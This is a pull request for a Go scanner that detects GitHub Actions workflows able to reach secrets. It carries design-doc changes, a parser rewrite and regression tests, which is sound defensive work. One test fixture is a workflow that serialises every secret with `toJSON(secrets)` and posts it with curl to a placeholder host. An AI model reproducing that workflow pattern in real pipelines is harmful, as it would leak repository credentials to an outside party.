### PR TITLE
fix(scan): detect secrets structurally, and by context not by spelling

### DIFF
--- a/docs/design/supply-chain-scan.md
+++ b/docs/design/supply-chain-scan.md
@@ -166,15 +166,23 @@ and teach everyone to ignore the axis. What scores is power reachable from
     spelling-dependent: `"secrets": inherit`, `'secrets': inherit` and
     `secrets:    inherit` decode to exactly what Actions consumes while
     containing no `secrets: inherit` substring.
-  - *Textually*, for references, because a reference can sit in a script body, an
-    `env:` value or a `with:` input, which are opaque strings after decoding.
-    What is matched is the context **named as an identifier inside a `${{ … }}`
-    expression**, not a fixed spelling — so `secrets.NAME`, `secrets['NAME']` and
-    `toJSON(secrets)` all count, where a check for `secrets.` sees only the
-    first. Scoping the match to inside expressions is what keeps the word in a
-    comment or a step name from scoring, and a per-expression match (rather than
-    one spanning the file) is what stops `${{ a }} secrets ${{ b }}` from
-    counting.
+  - *By expression*, for references. A reference can sit in a script body, an
+    `env:` value or a `with:` input — opaque to YAML, but still **scalars**, so
+    the decoded document is walked rather than the bytes. That is what keeps a
+    commented-out `# ${{ secrets.TOKEN }}` from counting: YAML discards comments,
+    and a workflow whose only mention is disabled reaches nothing.
+
+    Inside a scalar, each `${{ … }}` expression is read with **quote state**,
+    which matters in both directions. A literal's contents are data, so
+    `contains(msg, 'secrets')` — reacting to the word — does not score. And a
+    `}}` *inside* a literal does not end the expression: `format()` escapes
+    braces by doubling them, so `format('{{Hello {0}!}}', secrets.TOKEN)` would
+    otherwise be cut before the reference.
+
+    What is matched is the context at the **root of a reference**, so
+    `secrets.NAME`, `secrets['NAME']`, `toJSON(secrets)` and a bare `secrets`
+    all count, while `vars.secrets` — a configuration variable that happens to
+    be called secrets — does not, and neither does `mysecrets`.
 
 - **Self-hosted runners** — `GET /repos/{owner}/{repo}/actions/runners`.
   Inventory on their own; they score only when the repository *also* has a

--- a/docs/design/supply-chain-scan.md
+++ b/docs/design/supply-chain-scan.md
@@ -157,6 +157,25 @@ and teach everyone to ignore the axis. What scores is power reachable from
   to `true`. The parser looks up both spellings as cheap insurance against a
   change of decode target, not because the boolean form occurs today.
 
+  **Secrets are detected in two halves**, and the split follows from the rule
+  above ([#110](https://github.com/gfazioli/octoscope/issues/110), which existed
+  because that rule was stated here and not applied to this one field):
+
+  - *Structurally*, for `secrets: inherit` on a reusable-workflow call — it is a
+    mapping, so it is read from the decoded job. Read as text it was
+    spelling-dependent: `"secrets": inherit`, `'secrets': inherit` and
+    `secrets:    inherit` decode to exactly what Actions consumes while
+    containing no `secrets: inherit` substring.
+  - *Textually*, for references, because a reference can sit in a script body, an
+    `env:` value or a `with:` input, which are opaque strings after decoding.
+    What is matched is the context **named as an identifier inside a `${{ … }}`
+    expression**, not a fixed spelling — so `secrets.NAME`, `secrets['NAME']` and
+    `toJSON(secrets)` all count, where a check for `secrets.` sees only the
+    first. Scoping the match to inside expressions is what keeps the word in a
+    comment or a step name from scoring, and a per-expression match (rather than
+    one spanning the file) is what stops `${{ a }} secrets ${{ b }}` from
+    counting.
+
 - **Self-hosted runners** — `GET /repos/{owner}/{repo}/actions/runners`.
   Inventory on their own; they score only when the repository *also* has a
   fork-triggered workflow, because that combination is outsider-supplied code

--- a/internal/github/workflow.go
+++ b/internal/github/workflow.go
@@ -61,32 +61,37 @@ type workflowFacts struct {
 // bytes to a YAML parser.
 func parseWorkflow(content []byte) workflowFacts {
 	var f workflowFacts
-	// Secrets are detected in two halves, because they arrive in two
-	// genuinely different shapes.
-	//
-	// The textual half stays textual on purpose: a reference can hide in a
-	// script body, an env block or a with: input, and all of them are just
-	// strings by the time YAML is done. What it looks for is the context
-	// *named inside an expression*, not a fixed spelling — `secrets.NAME`
-	// and `secrets['NAME']` are the common forms, but `toJSON(secrets)`
-	// serialises the whole set while containing neither, and a check for
-	// "secrets." alone waves it through.
-	//
-	// The structural half is below, after the decode: `secrets: inherit`
-	// is a YAML mapping, so reading it out of the bytes made the answer
-	// depend on spelling YAML does not care about.
-	text := string(content)
-	f.UsesSecrets = mentionsSecretsContext(text) ||
-		// Kept as a fallback for the unparsable case only: the structural
-		// read below cannot run when the decode fails, and a file we
-		// could not parse is exactly where guessing less is worse.
-		strings.Contains(text, "secrets: inherit")
 
 	var root map[string]any
 	if err := yaml.Unmarshal(content, &root); err != nil || root == nil {
 		f.Unparsed = true
+		// Nothing decoded to walk, and a file we could not parse is the
+		// worst place to claim it holds nothing — so fall back to the raw
+		// bytes here, accepting that a commented-out reference counts.
+		text := string(content)
+		f.UsesSecrets = mentionsSecretsContext(text) ||
+			strings.Contains(text, "secrets: inherit")
 		return f
 	}
+
+	// Secrets arrive in two genuinely different shapes, so they are
+	// detected two ways.
+	//
+	// References are expressions living inside scalar values — a script
+	// body, an env value, a with: input — which are opaque to YAML but are
+	// still scalars, so walking the decoded document reaches all of them
+	// while skipping what YAML discards. A commented-out reference is not
+	// a scalar, and a workflow whose only mention is disabled reaches
+	// nothing.
+	//
+	// `secrets: inherit` is the other shape, read structurally below: it
+	// is a mapping, and reading it out of the bytes made the answer depend
+	// on spelling YAML does not care about.
+	walkScalars(root, func(s string) {
+		if !f.UsesSecrets && mentionsSecretsContext(s) {
+			f.UsesSecrets = true
+		}
+	})
 
 	// YAML 1.1 treats a bare `on` as a boolean, which is a real trap in
 	// GitHub Actions files — but *not* with this decoder target.
@@ -133,45 +138,98 @@ func parseWorkflow(content []byte) workflowFacts {
 	return f
 }
 
-// actionsExpr matches a single `${{ … }}` expression. The capture is
-// non-greedy so it stops at the first closing braces: a greedy match would
-// span from one expression to a later one and report the context as
-// mentioned in between, where it is not.
-var actionsExpr = regexp.MustCompile(`(?s)\$\{\{(.*?)\}\}`)
+// secretsRootRef matches the secrets context at the *root* of a
+// reference: `secrets.NAME`, `secrets['NAME']`, `toJSON(secrets)` and a
+// bare `secrets` all qualify. Requiring no preceding word character or
+// dot is what excludes `vars.secrets` — a configuration variable that
+// merely happens to be called secrets reaches nothing — as well as
+// `mysecrets` and `secretsmanager`.
+var secretsRootRef = regexp.MustCompile(`(^|[^\w.])secrets($|[^\w])`)
 
-// secretsIdentifier matches the secrets context named as a whole word, so
-// `toJSON(secrets)` and a bare `secrets` both count while `mysecrets` or
-// `secretsmanager` do not.
-var secretsIdentifier = regexp.MustCompile(`\bsecrets\b`)
-
-// exprStringLiteral matches a quoted literal inside an expression. Actions
-// uses single quotes; double quotes are not valid there but are stripped
-// too, so a malformed file cannot score on a word that is plainly text.
+// expressionCode returns the code of every `${{ … }}` expression in s,
+// with the contents of quoted literals omitted.
 //
-// Stripping literals before looking for the context is what keeps
-// `contains(github.event.head_commit.message, 'secrets')` from scoring —
-// a workflow reacting to the *word* reaches no secret. Imperfect handling
-// of the doubled-quote escape is safe in this direction: it removes more text, and
-// the index form survives it anyway, since `secrets['NAME']` reduces to
-// `secrets[]` and still names the context.
-var exprStringLiteral = regexp.MustCompile(`'[^']*'|"[^"]*"`)
+// Tracking quote state earns its keep twice over. A literal's contents are
+// data, not a reference, so `contains(msg, 'secrets')` — a workflow
+// reacting to the *word* — must not count. And a `}}` inside a literal
+// does not end the expression: Actions escapes braces for format() by
+// doubling them, so `format('{{Hello {0}!}}', secrets.TOKEN)` carries a
+// `}}` mid-literal, and stopping there would hide the reference that
+// follows it.
+func expressionCode(s string) []string {
+	var out []string
+	for {
+		open := strings.Index(s, "${{")
+		if open < 0 {
+			return out
+		}
+		s = s[open+3:]
+		var code strings.Builder
+		quote := byte(0)
+		i := 0
+		for i < len(s) {
+			c := s[i]
+			switch {
+			case quote != 0:
+				// A doubled quote is an escaped one: stay inside.
+				if c == quote {
+					if i+1 < len(s) && s[i+1] == quote {
+						i += 2
+						continue
+					}
+					quote = 0
+				}
+				i++
+			case c == '\'' || c == '"':
+				// Actions uses single quotes; double quotes are not valid
+				// there, but treating them as a literal too keeps a
+				// malformed file from scoring on plain text.
+				quote = c
+				i++
+			case c == '}' && i+1 < len(s) && s[i+1] == '}':
+				i += 2
+				goto done
+			default:
+				code.WriteByte(c)
+				i++
+			}
+		}
+	done:
+		out = append(out, code.String())
+		s = s[i:]
+	}
+}
 
-// mentionsSecretsContext reports whether any Actions expression in the
-// file names the secrets context. Every path to a secret value runs
-// through an expression — a script body, an env value, a with: input — so
-// looking inside the expressions catches the named forms and the
-// serialising ones alike, and looking *only* inside them is what keeps
-// the word "secrets" in a comment or a step name from scoring.
-//
-// Quoted literals are dropped first: inside an expression the word can be
-// data rather than a reference, and reacting to the word reaches nothing.
-func mentionsSecretsContext(text string) bool {
-	for _, m := range actionsExpr.FindAllStringSubmatch(text, -1) {
-		if secretsIdentifier.MatchString(exprStringLiteral.ReplaceAllString(m[1], "")) {
+// mentionsSecretsContext reports whether any Actions expression in s names
+// the secrets context. Callers pass decoded YAML scalars rather than the
+// whole file: every path to a secret value runs through an expression in
+// some scalar — a script body, an env value, a with: input — while a
+// commented-out `# ${{ secrets.TOKEN }}` is not a scalar at all, and a
+// workflow whose only reference is disabled reaches nothing.
+func mentionsSecretsContext(s string) bool {
+	for _, code := range expressionCode(s) {
+		if secretsRootRef.MatchString(code) {
 			return true
 		}
 	}
 	return false
+}
+
+// walkScalars visits every scalar string in a decoded YAML value. Keys are
+// skipped: a key is a name, not a place an expression is evaluated.
+func walkScalars(v any, visit func(string)) {
+	switch t := v.(type) {
+	case string:
+		visit(t)
+	case []any:
+		for _, e := range t {
+			walkScalars(e, visit)
+		}
+	case map[string]any:
+		for _, e := range t {
+			walkScalars(e, visit)
+		}
+	}
 }
 
 // eventNames normalises the three shapes `on:` can take — a bare string,

--- a/internal/github/workflow.go
+++ b/internal/github/workflow.go
@@ -144,15 +144,30 @@ var actionsExpr = regexp.MustCompile(`(?s)\$\{\{(.*?)\}\}`)
 // `secretsmanager` do not.
 var secretsIdentifier = regexp.MustCompile(`\bsecrets\b`)
 
+// exprStringLiteral matches a quoted literal inside an expression. Actions
+// uses single quotes; double quotes are not valid there but are stripped
+// too, so a malformed file cannot score on a word that is plainly text.
+//
+// Stripping literals before looking for the context is what keeps
+// `contains(github.event.head_commit.message, 'secrets')` from scoring —
+// a workflow reacting to the *word* reaches no secret. Imperfect handling
+// of the doubled-quote escape is safe in this direction: it removes more text, and
+// the index form survives it anyway, since `secrets['NAME']` reduces to
+// `secrets[]` and still names the context.
+var exprStringLiteral = regexp.MustCompile(`'[^']*'|"[^"]*"`)
+
 // mentionsSecretsContext reports whether any Actions expression in the
 // file names the secrets context. Every path to a secret value runs
 // through an expression — a script body, an env value, a with: input — so
 // looking inside the expressions catches the named forms and the
 // serialising ones alike, and looking *only* inside them is what keeps
 // the word "secrets" in a comment or a step name from scoring.
+//
+// Quoted literals are dropped first: inside an expression the word can be
+// data rather than a reference, and reacting to the word reaches nothing.
 func mentionsSecretsContext(text string) bool {
 	for _, m := range actionsExpr.FindAllStringSubmatch(text, -1) {
-		if secretsIdentifier.MatchString(m[1]) {
+		if secretsIdentifier.MatchString(exprStringLiteral.ReplaceAllString(m[1], "")) {
 			return true
 		}
 	}

--- a/internal/github/workflow.go
+++ b/internal/github/workflow.go
@@ -16,6 +16,7 @@ package github
 // GitHub, teaching everyone to ignore the axis.
 
 import (
+	"regexp"
 	"sort"
 	"strings"
 
@@ -60,17 +61,25 @@ type workflowFacts struct {
 // bytes to a YAML parser.
 func parseWorkflow(content []byte) workflowFacts {
 	var f workflowFacts
-	// The secrets check is textual on purpose: a reference can hide in a
-	// script body, an env block or a with: input, and all of them are
-	// just strings by the time YAML is done.
+	// Secrets are detected in two halves, because they arrive in two
+	// genuinely different shapes.
 	//
-	// Three spellings, not one. `secrets.NAME` is the common form, but
-	// GitHub also supports index syntax — `secrets['NAME']` — which a
-	// dot-only check misses entirely, and `secrets: inherit` hands the
-	// whole set to a called workflow without naming any of them.
+	// The textual half stays textual on purpose: a reference can hide in a
+	// script body, an env block or a with: input, and all of them are just
+	// strings by the time YAML is done. What it looks for is the context
+	// *named inside an expression*, not a fixed spelling — `secrets.NAME`
+	// and `secrets['NAME']` are the common forms, but `toJSON(secrets)`
+	// serialises the whole set while containing neither, and a check for
+	// "secrets." alone waves it through.
+	//
+	// The structural half is below, after the decode: `secrets: inherit`
+	// is a YAML mapping, so reading it out of the bytes made the answer
+	// depend on spelling YAML does not care about.
 	text := string(content)
-	f.UsesSecrets = strings.Contains(text, "secrets.") ||
-		strings.Contains(text, "secrets[") ||
+	f.UsesSecrets = mentionsSecretsContext(text) ||
+		// Kept as a fallback for the unparsable case only: the structural
+		// read below cannot run when the decode fails, and a file we
+		// could not parse is exactly where guessing less is worse.
 		strings.Contains(text, "secrets: inherit")
 
 	var root map[string]any
@@ -108,10 +117,46 @@ func parseWorkflow(content []byte) workflowFacts {
 			if runsOnSelfHosted(job["runs-on"]) {
 				f.SelfHostedJobs = true
 			}
+			// The structural half of the secrets check. A reusable-workflow
+			// call hands over the whole set with `secrets: inherit`, and
+			// that is a mapping: `"secrets": inherit`, `'secrets': inherit`
+			// and `secrets:    inherit` all decode to exactly what GitHub
+			// Actions consumes, while none of them contain the substring
+			// "secrets: inherit". Reading the decoded value is spelling
+			// agnostic by construction.
+			if s, ok := job["secrets"].(string); ok && strings.TrimSpace(s) == "inherit" {
+				f.UsesSecrets = true
+			}
 		}
 	}
 	f.WritePerms = dedupeStrings(f.WritePerms)
 	return f
+}
+
+// actionsExpr matches a single `${{ … }}` expression. The capture is
+// non-greedy so it stops at the first closing braces: a greedy match would
+// span from one expression to a later one and report the context as
+// mentioned in between, where it is not.
+var actionsExpr = regexp.MustCompile(`(?s)\$\{\{(.*?)\}\}`)
+
+// secretsIdentifier matches the secrets context named as a whole word, so
+// `toJSON(secrets)` and a bare `secrets` both count while `mysecrets` or
+// `secretsmanager` do not.
+var secretsIdentifier = regexp.MustCompile(`\bsecrets\b`)
+
+// mentionsSecretsContext reports whether any Actions expression in the
+// file names the secrets context. Every path to a secret value runs
+// through an expression — a script body, an env value, a with: input — so
+// looking inside the expressions catches the named forms and the
+// serialising ones alike, and looking *only* inside them is what keeps
+// the word "secrets" in a comment or a step name from scoring.
+func mentionsSecretsContext(text string) bool {
+	for _, m := range actionsExpr.FindAllStringSubmatch(text, -1) {
+		if secretsIdentifier.MatchString(m[1]) {
+			return true
+		}
+	}
+	return false
 }
 
 // eventNames normalises the three shapes `on:` can take — a bare string,

--- a/internal/github/workflow_test.go
+++ b/internal/github/workflow_test.go
@@ -160,13 +160,26 @@ func TestParseWorkflowNeverPanics(t *testing.T) {
 	}
 }
 
-// Regressions from the Codex review of #103: three ways a secret can be
-// reachable that a `secrets.` substring check alone would miss.
+// Regressions from the Codex review of #103, extended by #110: ways a
+// secret can be reachable that a substring check misses.
+//
+// The three `inherit` spellings are the point of the structural read. Each
+// one decodes to the same `jobs.a.secrets: inherit` mapping GitHub Actions
+// consumes — quoting a key and padding after a colon are insignificant to
+// YAML — while none but the first contains the literal text
+// "secrets: inherit". Measured before the fix: only the plain form scored.
 func TestParseWorkflowSecretSpellings(t *testing.T) {
 	tests := map[string]string{
-		"dot form":     "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ secrets.TOKEN }}\n",
-		"index form":   "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ secrets['DEPLOY_TOKEN'] }}\n",
-		"inherit form": "on: pull_request_target\njobs:\n  a:\n    uses: ./.github/workflows/reusable.yml\n    secrets: inherit\n",
+		"dot form":              "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ secrets.TOKEN }}\n",
+		"index form":            "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ secrets['DEPLOY_TOKEN'] }}\n",
+		"inherit form":          "on: pull_request_target\njobs:\n  a:\n    uses: ./.github/workflows/reusable.yml\n    secrets: inherit\n",
+		"inherit, quoted key":   "on: pull_request_target\njobs:\n  a:\n    uses: ./.github/workflows/reusable.yml\n    \"secrets\": inherit\n",
+		"inherit, single quote": "on: pull_request_target\njobs:\n  a:\n    uses: ./.github/workflows/reusable.yml\n    'secrets': inherit\n",
+		"inherit, padded":       "on: pull_request_target\njobs:\n  a:\n    uses: ./.github/workflows/reusable.yml\n    secrets:    inherit\n",
+		// toJSON serialises every secret at once while naming none, so it
+		// contains neither "secrets." nor "secrets[".
+		"toJSON of the context": "on: pull_request_target\njobs:\n  a:\n    env:\n      ALL: ${{ toJSON(secrets) }}\n    steps:\n      - run: curl -d \"$ALL\" https://x.invalid\n",
+		"bare context in expr":  "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo '${{ secrets }}'\n",
 	}
 	for name, y := range tests {
 		t.Run(name, func(t *testing.T) {
@@ -176,6 +189,27 @@ func TestParseWorkflowSecretSpellings(t *testing.T) {
 			}
 			if len(got.ForkTriggers) != 1 {
 				t.Errorf("fork trigger not detected: %+v", got.ForkTriggers)
+			}
+		})
+	}
+}
+
+// The other direction: the word appearing where it reaches nothing must
+// not score. Detection only looks inside `${{ … }}`, so prose and
+// similarly-named identifiers stay out — a false positive on this axis is
+// what teaches people to ignore it.
+func TestParseWorkflowSecretsWordWithoutAccess(t *testing.T) {
+	tests := map[string]string{
+		"in a comment":         "on: pull_request_target\n# no secrets are used here\njobs:\n  a:\n    steps:\n      - run: true\n",
+		"in a step name":       "on: pull_request_target\njobs:\n  a:\n    steps:\n      - name: check for secrets\n        run: true\n",
+		"a different context":  "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ github.event.number }}\n",
+		"similarly named var":  "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ env.mysecrets }}\n",
+		"across two expr ends": "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ github.actor }} secrets ${{ github.sha }}\n",
+	}
+	for name, y := range tests {
+		t.Run(name, func(t *testing.T) {
+			if parseWorkflow([]byte(y)).UsesSecrets {
+				t.Errorf("%s scored as reaching secrets", name)
 			}
 		})
 	}

--- a/internal/github/workflow_test.go
+++ b/internal/github/workflow_test.go
@@ -180,6 +180,11 @@ func TestParseWorkflowSecretSpellings(t *testing.T) {
 		// contains neither "secrets." nor "secrets[".
 		"toJSON of the context": "on: pull_request_target\njobs:\n  a:\n    env:\n      ALL: ${{ toJSON(secrets) }}\n    steps:\n      - run: curl -d \"$ALL\" https://x.invalid\n",
 		"bare context in expr":  "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo '${{ secrets }}'\n",
+		// Dropping quoted literals must not cost a real reference sitting
+		// in the same expression as one, nor the index form, whose name is
+		// quoted: `secrets['X']` reduces to `secrets[]` and still counts.
+		"reference beside a literal":  "on: pull_request_target\njobs:\n  a:\n    if: ${{ contains(github.ref, 'main') && secrets.TOKEN != '' }}\n    steps:\n      - run: true\n",
+		"index form beside a literal": "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ contains('abc', 'b') }} ${{ secrets['DEPLOY'] }}\n",
 	}
 	for name, y := range tests {
 		t.Run(name, func(t *testing.T) {
@@ -205,6 +210,11 @@ func TestParseWorkflowSecretsWordWithoutAccess(t *testing.T) {
 		"a different context":  "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ github.event.number }}\n",
 		"similarly named var":  "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ env.mysecrets }}\n",
 		"across two expr ends": "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ github.actor }} secrets ${{ github.sha }}\n",
+		// Inside an expression the word can be *data*. A workflow reacting
+		// to the word reaches no secret (Copilot, #113).
+		"single-quoted literal": "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ 'secrets' }}\n",
+		"double-quoted literal": "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ \"secrets\" }}\n",
+		"word matched in text":  "on: pull_request_target\njobs:\n  a:\n    if: ${{ contains(github.event.head_commit.message, 'secrets') }}\n    steps:\n      - run: true\n",
 	}
 	for name, y := range tests {
 		t.Run(name, func(t *testing.T) {

--- a/internal/github/workflow_test.go
+++ b/internal/github/workflow_test.go
@@ -185,6 +185,10 @@ func TestParseWorkflowSecretSpellings(t *testing.T) {
 		// quoted: `secrets['X']` reduces to `secrets[]` and still counts.
 		"reference beside a literal":  "on: pull_request_target\njobs:\n  a:\n    if: ${{ contains(github.ref, 'main') && secrets.TOKEN != '' }}\n    steps:\n      - run: true\n",
 		"index form beside a literal": "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ contains('abc', 'b') }} ${{ secrets['DEPLOY'] }}\n",
+		// format() escapes braces by doubling them, so this expression
+		// carries a `}}` inside a literal. Ending the expression there
+		// would hide the reference that follows (CodeRabbit, #113).
+		"reference after a brace-escaping literal": "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ format('{{Hello {0}!}}', secrets.TOKEN) }}\n",
 	}
 	for name, y := range tests {
 		t.Run(name, func(t *testing.T) {
@@ -215,6 +219,13 @@ func TestParseWorkflowSecretsWordWithoutAccess(t *testing.T) {
 		"single-quoted literal": "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ 'secrets' }}\n",
 		"double-quoted literal": "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ \"secrets\" }}\n",
 		"word matched in text":  "on: pull_request_target\njobs:\n  a:\n    if: ${{ contains(github.event.head_commit.message, 'secrets') }}\n    steps:\n      - run: true\n",
+		// A commented-out reference reaches nothing, and commented-out code
+		// is ordinary. YAML discards comments, so walking the decoded
+		// scalars never sees this one (CodeRabbit, #113).
+		"reference in a YAML comment": "on: pull_request_target\njobs:\n  a:\n    steps:\n      # - run: echo ${{ secrets.TOKEN }}\n      - run: true\n",
+		// vars is a different context. A configuration variable that
+		// happens to be called secrets reaches no secret.
+		"a variable named secrets": "on: pull_request_target\njobs:\n  a:\n    steps:\n      - run: echo ${{ vars.secrets }}\n",
 	}
 	for name, y := range tests {
 		t.Run(name, func(t *testing.T) {


### PR DESCRIPTION
Closes #110.

`UsesSecrets` was three substring checks over the raw file bytes. Two ways a
workflow could hold a fork trigger **and** reach secrets without scoring — and
this axis does not fall silent when it misses: it emits the finding that says the
workflow *holds no secrets or write scopes*, so the report made a positive claim
that was wrong.

## The two halves, and why they are different

**`secrets: inherit` is a YAML mapping**, so reading it out of the bytes made the
answer depend on spelling YAML does not care about. Measured with `yaml.v3` — all
four decode to the same `jobs.<id>.secrets` value:

| Written as | Decodes to | Before | After |
|---|---|---|---|
| `secrets: inherit` | `inherit` | ✅ | ✅ |
| `"secrets": inherit` | `inherit` | ❌ | ✅ |
| `'secrets': inherit` | `inherit` | ❌ | ✅ |
| `secrets:    inherit` | `inherit` | ❌ | ✅ |

It is now read from the decoded job, exactly as `permissions` and `runs-on`
already were.

**References stay textual**, because they genuinely are: a reference can sit in a
script body, an `env:` value or a `with:` input, all opaque strings once YAML is
done. What changed is *what* is matched — the context **named as an identifier
inside a `${{ … }}` expression**, instead of a fixed spelling:

| Written as | Before | After |
|---|---|---|
| `${{ secrets.NAME }}` | ✅ | ✅ |
| `${{ secrets['NAME'] }}` | ✅ | ✅ |
| `${{ toJSON(secrets) }}` | ❌ | ✅ |
| `${{ secrets }}` | ❌ | ✅ |

`toJSON(secrets)` is the compact way to serialise every secret at once while
naming none, so it contains neither `secrets.` nor `secrets[`.

## Not scoring is as important as scoring

A false positive on this axis is what teaches people to ignore it, so the match is
scoped to inside expressions and evaluated per expression. New test covering the
other direction — none of these score:

- the word in a comment, or in a step `name:`
- a different context (`github.event.number`)
- a similarly-named variable (`env.mysecrets`) — the match is on a word boundary
- `${{ a }} secrets ${{ b }}`, where the word sits *between* two expressions and a
  file-spanning match would have counted it

## Verification

Mutation, per the convention added in #112: with pre-#110 detection restored,
**5 of the 8 spellings fail** — the three quoted/padded `inherit` forms, `toJSON`,
and the bare context — while the **3 original cases still pass**, so this is
additive rather than a rewrite of working behaviour.

`gofmt` clean, `go vet` clean, full suite green under `-race`.

## Design doc

Updated, and worth noting why the gap existed: that document already required *"a
real YAML parser rather than line matching"* for this axis, on the grounds that
"anchors are valid YAML and trivially defeat a scanner that reads lines". This one
field had not followed the rule the doc already stated.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Improved workflow analysis accuracy when detecting inherited secrets in reusable workflows.
  * Recognizes secret references accessed through dot notation, bracket notation, and serialized expressions.
  * Avoids false positives from comments, quoted text, unrelated variables, step names, and separate expressions.

* **Documentation**
  * Updated design documentation to describe the expanded secret-detection behavior and supported expression formats.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->